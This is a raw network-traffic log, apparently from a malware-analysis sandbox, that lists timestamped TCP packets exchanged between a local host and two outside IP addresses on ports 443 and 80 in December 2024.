                                                                                                                                                                                              Dec 16, 2024 01:01:23.228483915 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.228538036 CET49776443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:23.230030060 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.230042934 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.230092049 CET49776443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:23.230101109 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.230139971 CET49776443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:23.231800079 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.231811047 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.231862068 CET49776443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:23.231870890 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.231910944 CET49776443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:23.237384081 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.237397909 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.237452984 CET49776443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:23.237462044 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.237500906 CET49776443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:23.255683899 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.255762100 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.255775928 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.255930901 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.256275892 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.256351948 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.256599903 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.256656885 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.257215023 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.257273912 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.258357048 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.258414984 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.258415937 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.258455038 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.258471966 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.258506060 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.259704113 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.259759903 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.260729074 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.260766983 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.260792017 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.260823011 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.261912107 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.261955976 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.261976957 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.262010098 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.262027979 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.262062073 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.263081074 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.263139009 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.263737917 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.263797998 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.265225887 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.265284061 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.265415907 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.265451908 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.265475035 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.265503883 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.265523911 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.266665936 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.266701937 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.266731024 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.266737938 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.266752958 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.266786098 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.267926931 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.267987013 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.268942118 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.268976927 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.269000053 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.269036055 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.270045042 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.270101070 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.270102978 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.270138025 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.270159006 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.270195007 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.271343946 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.271404982 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.272459030 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.272495031 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.272516966 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.272546053 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.272911072 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.272978067 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.274791956 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.274826050 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.274852991 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.274862051 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.274876118 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.274903059 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.274964094 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.275021076 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.275978088 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.276016951 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.276036024 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.276067019 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.277332067 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.277390003 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.277734995 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.277800083 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.278321028 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.278372049 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.278372049 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.278429031 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.279685020 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.279742956 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.280635118 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.280670881 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.280689001 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.280720949 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.281419992 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.281476974 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.281795025 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.281831980 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.281852007 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.281883001 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.282959938 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.283018112 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.284113884 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.284169912 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.284204006 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.284240961 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.284260035 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.284288883 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.285303116 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.285361052 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.286503077 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.286539078 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.286561012 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.286590099 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.286617994 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.286670923 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.287667990 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.287722111 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.287839890 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.287908077 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.288829088 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.288863897 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.288885117 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.288913965 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.289958954 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.290014029 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.291191101 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.291228056 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.291249037 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.291275978 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.291337013 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.291394949 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.292319059 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.292376041 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.293221951 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.293278933 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.293508053 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.293544054 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.293565035 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.293596029 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.294709921 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.294744968 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.294766903 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.294796944 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.295830965 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.295886993 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.296150923 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.296216965 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.296996117 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.297053099 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.297091961 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.297154903 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.298196077 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.298254967 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.298496008 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.298553944 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.299349070 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.299417973 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.299794912 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.299866915 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.300611019 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.300668001 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.300757885 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.300817013 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.301709890 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.301745892 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.301768064 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.301798105 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.302921057 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.302958012 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.302979946 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.303010941 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.304049015 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.304107904 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.305227995 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.305263996 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.305298090 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.305325031 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.305357933 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.305409908 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.306350946 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.306421041 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.306539059 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.306595087 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.307534933 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.307590961 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.307663918 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.307719946 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.308758974 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.308818102 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.308908939 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.308967113 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.309951067 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.309984922 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.310009003 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.310039997 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.311069965 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.311129093 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.311336994 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.311419964 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.312197924 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.312253952 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.312299013 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.312346935 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.344265938 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.344338894 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.344774961 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.344821930 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.344860077 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.344928980 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.344928980 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.344929934 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.345442057 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.345501900 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.345593929 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.345649958 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.345726013 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.345738888 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.345801115 CET49776443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:23.345833063 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.345877886 CET49776443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:23.346690893 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.346728086 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.346762896 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.346787930 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.451462030 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.451476097 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.451637030 CET49776443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:23.451664925 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.451713085 CET49776443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:23.457107067 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.457118034 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.457184076 CET49776443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:23.457192898 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.457227945 CET49776443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:23.467145920 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.467156887 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.467252016 CET49776443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:23.467273951 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.467411041 CET49776443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:23.472821951 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.472832918 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.472888947 CET49776443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:23.472894907 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.472933054 CET49776443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:23.477648020 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.477659941 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.477718115 CET49776443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:23.477729082 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.477766991 CET49776443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:23.483221054 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.483232975 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.483285904 CET49776443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:23.483293056 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.483328104 CET49776443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:23.486927032 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.486985922 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.486993074 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.487034082 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.487341881 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.487401962 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.487445116 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.487504005 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.488199949 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.488212109 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.488270998 CET49776443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:23.488277912 CET44349776154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.488316059 CET49776443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:23.488440990 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.488478899 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.488503933 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.488534927 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.489751101 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.489805937 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.489893913 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.489949942 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:23.490987062 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.491022110 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:23.491044998 CET4980080192.168.2.431.41.244.11
